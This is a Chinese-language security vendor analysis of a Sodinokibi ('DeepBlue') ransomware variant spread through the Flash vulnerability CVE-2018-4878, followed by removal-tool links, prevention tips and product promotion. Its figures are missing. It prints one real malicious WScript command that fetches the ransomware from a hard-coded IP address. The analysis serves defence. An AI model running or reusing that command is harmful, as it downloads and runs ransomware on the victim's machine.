自GandCrab宣布停止运营以来,勒索病毒攻击事件并没有随着GandCrab的退出而减少,全球各地每天仍有用户因为数据遭到加密而损失惨重。在后来居上的各个勒索病毒家族中,Sodinokibi勒索已经成为了现在全球最流行的勒索病毒之一,也叫称为GandCrab的”接班人”。
Sodinokibi勒索病毒的部分变种在加密后会将受害主机的屏幕设置成深蓝色,因此也被称为“DeepBlue”勒索,早在该勒索病毒活动的初期,深信服安全团队就已捕获到其利用Confluence漏洞(CVE-2019-3396)进行攻击的案例:《警惕“侠盗”团伙利用新型漏洞传播GandCrab勒索“蓝屏”变种》详细链接: https://mp.weixin.qq.com/s/0-5xweSvuGpDhHdNAMO6qg.
近日,国外安全研究人员发现Sodinokibi勒索病毒利用CVE-2018-4878漏洞进行传播,深信服安全团队第一时间捕获到了相应的样本,并进行了详细分析。
CVE-2018-4878漏洞是一个UAF漏洞,位于Flash的com.adobe.tvsdk包中,如下所示:
shellcode代码通过获取CreateProcessA的函数地址,调用CMD命令执行恶意下载操作,如下所示:
动态调式,获取CMD命令,如下所示:
获取的CMD命令代码,如下所示:
通过CMD命令,调用WScript进程执行脚本,如下所示:
调用脚本命令参数,如下所示:
脚本内容,如下所示:
wsCripT //B //E:JScript T.t "ctELwuzs5N95a"
"http://176.57.220.28/?NTcxMDkx&OHqFPlRweVwKRC&PbNNzQhVmHSdZF=difference&t4tsdfsg4=7cDOArojBfTcwxlmosOVl1B86D7i0fVz0LPhJ6FqEfeNA0U_aKTErg92lr8zLgkLYsk9w&SGZPTVoZDZUE=constitution&mtcfabVTX=referred&TfDencoKhLpWmWy=detonator&CMIHZK=everyone&jsUXxcuwwzXQs=known&niJebNseKTId=detonator&SkHDbOnITQuC=wrapped&fwFOBGCULm=professional&AiNfixYteBuTPc=professional&wpdPCwSHxUCq=community&ff5sdfds=w3nQMvXcJxnQFYbGMv3DSKNbNkbWHViPxoiG9MildZmqZGX_k7vDfF-qoVXcCgWRxfQuf&LUbaPnkXKQhJ=known&pUljixFjY=community&fspuvfWRXEoRhF=known&UolvaBlNUoGliy=referred&dcavylKzLRHQNDE2Nzk4" "?
通过脚本下载Sodinokibi勒索病毒,能通过动态调试,提取出里面核心Payload,如下所示:
将此勒索变种的核心功能代码与我们之前捕获分析的Sodinokibi勒索病毒核心代码进行对比分析,如下所示:
代码的相似度达到94%以上,可以认定为是Sodinokibi勒索病毒的变种样本,此勒索病毒变种生成的最新的“蓝屏”桌面背景,如下所示:
生成的勒索信息文本,如下所示:
解密的网址,如下所示:
遗憾的是,这款病毒暂时还没有解密工具,建议尽快对感染主机进行断网隔离。深信服提醒广大用户尽快做好病毒检测与防御措施,防范该病毒家族的勒索攻击。
病毒检测查杀
1、深信服为广大用户免费提供查杀工具,可下载如下工具,进行检测查杀。
64位系统下载链接:
http://edr.sangfor.com.cn/tool/SfabAntiBot_X64.7z
32位系统下载链接:
http://edr.sangfor.com.cn/tool/SfabAntiBot_X86.7z
2、深信服EDR产品、下一代防火墙及安全感知平台等安全产品均具备病毒检测能力,部署相关产品用户可进行病毒检测。
深信服安全团队再次提醒广大用户,勒索病毒以防为主,目前大部分勒索病毒加密后的文件都无法解密,注意日常防范措施:
1、及时给电脑打补丁,修复漏洞。
2、对重要的数据文件定期进行非本地备份。
3、不要点击来源不明的邮件附件,不从不明网站下载软件。
4、尽量关闭不必要的文件共享权限。
5、更改账户密码,设置强密码,避免使用统一的密码,因为统一的密码会导致一台被攻破,多台遭殃。
6、如果业务上无需使用RDP的,建议关闭RDP。当出现此类事件时,推荐使用深信服防火墙,或者终端检测响应平台(EDR)的微隔离功能对3389等端口进行封堵,防止扩散!
7、深信服防火墙、终端检测响应平台(EDR)均有防爆破功能,防火墙开启此功能并启用11080051、11080027、11080016规则,EDR开启防爆破功能可进行防御。
8、深信服防火墙客户,建议升级到AF805版本,并开启人工智能引擎Save,以达到最好的防御效果。
9、使用深信服安全产品,接入安全云脑,使用云查服务可以即时检测防御新威胁。
最后,建议企业对全网进行一次安全检查和杀毒扫描,加强防护工作。推荐使用深信服安全感知+防火墙+EDR,对内网进行感知、查杀和防护。